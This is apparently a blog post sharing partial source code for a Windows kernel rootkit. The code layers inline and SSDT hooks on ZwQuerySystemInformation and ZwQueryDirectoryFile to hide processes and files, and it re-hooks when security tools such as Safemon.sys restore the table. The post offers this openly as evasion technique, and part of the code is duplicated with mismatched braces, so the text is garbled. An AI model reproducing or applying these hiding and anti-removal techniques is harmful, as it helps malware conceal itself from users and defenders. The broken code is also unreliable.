Author:HSQ
Hook realy is art, In the fight to survive, Good jobs.
Here, Only talk thing of dispose , Non full code.
Code:
// Two layers HOOK: 1.First install Inline hook when don't use SSDT HOOK
...
SetInLineHookZwQueryDirectoryFile();
SetInLineHookZwQuerySystemInformation();
// Two layers HOOK: 2.Then install outer SSDT HOOK, Like this even if hook recovered by other tools, Intimal hook work yet.
InHookSSDTNativeAPI();
...
//////////////////////////////////////////////////////////////////////////////
.....................
////////////////////// Do any thing //////////////////////////////////////////
// Hide process
if(NT_SUCCESS(ntStatus))
{ ZWQUERYSYSTEMINFORMATION TempCheckInSSDTSpace=(ZWQUERYSYSTEMINFORMATION)SYSTEMSERVICE(ZwQuerySystemInformation);
// Check whether SSDT hook is exist, Avoidance of repetition work; Of cause may repetition work,
// Don't BSOD, Explain code robust ^-^.
if(HookSSDTZwQuerySystemInformation!=TempCheckInSSDTSpace)
{ // When onself ssdt hook is remove, Let's Inline Hook replace it to continue work
//if(0x81000000 > (ULONG)TempCheckInSSDTSpace)
HideFileFromZwQuerySystemInformation(SystemInformationClass,SystemInformation);
if (TempCheckInSSDTSpace != OldZwQuerySystemInformation)
{ // If Inline hook already hook to layer space of ssdt, need check KIRQL, Then dusoise
// for avert BSOD!
if(DISPATCH_LEVEL >= KeGetCurrentIrql())
// Now can't gobbles up CPU times, If Safemon.sys distribute function , //maybe system resource use up. SSDT HOOK of SMM can't pass up, Let Inline hook stand up to
// a kinds of test^-^
DbgPrint("Rootkit: Hook Inline ZwQuerySystemInformation() Worked ok!\n");
//
}
else
{
DbgPrint("Rootkit: Hook Inline ZwQuerySystemInformation() Worked ok!\n");
//
}
}
else
{
DbgPrint("Rootkit: SSDT HOOK ZwQuerySystemInformation is exist, Inline Hook not need to do any thing any more!\n");
}
}
////////////////////// Do any thing //////////////////////////////////////////
if(DISPATCH_LEVEL >= KeGetCurrentIrql())
// Now can't gobbles up CPU times, If Safemon.sys distribute function , //maybe system resource use up. SSDT HOOK of SMM can't pass up, Let Inline hook stand up to
// a kinds of test^-^
DbgPrint("Rootkit: Hook Inline ZwQuerySystemInformation() Worked ok!\n");
//
}
else
{
DbgPrint("Rootkit: Hook Inline ZwQuerySystemInformation() Worked ok!\n");
//
}
}
else
{
DbgPrint("Rootkit: SSDT HOOK ZwQuerySystemInformation is exist, Inline Hook not need to do any thing any more!\n");
}
}
////////////////////// Do any thing //////////////////////////////////////////
No comments:
Post a Comment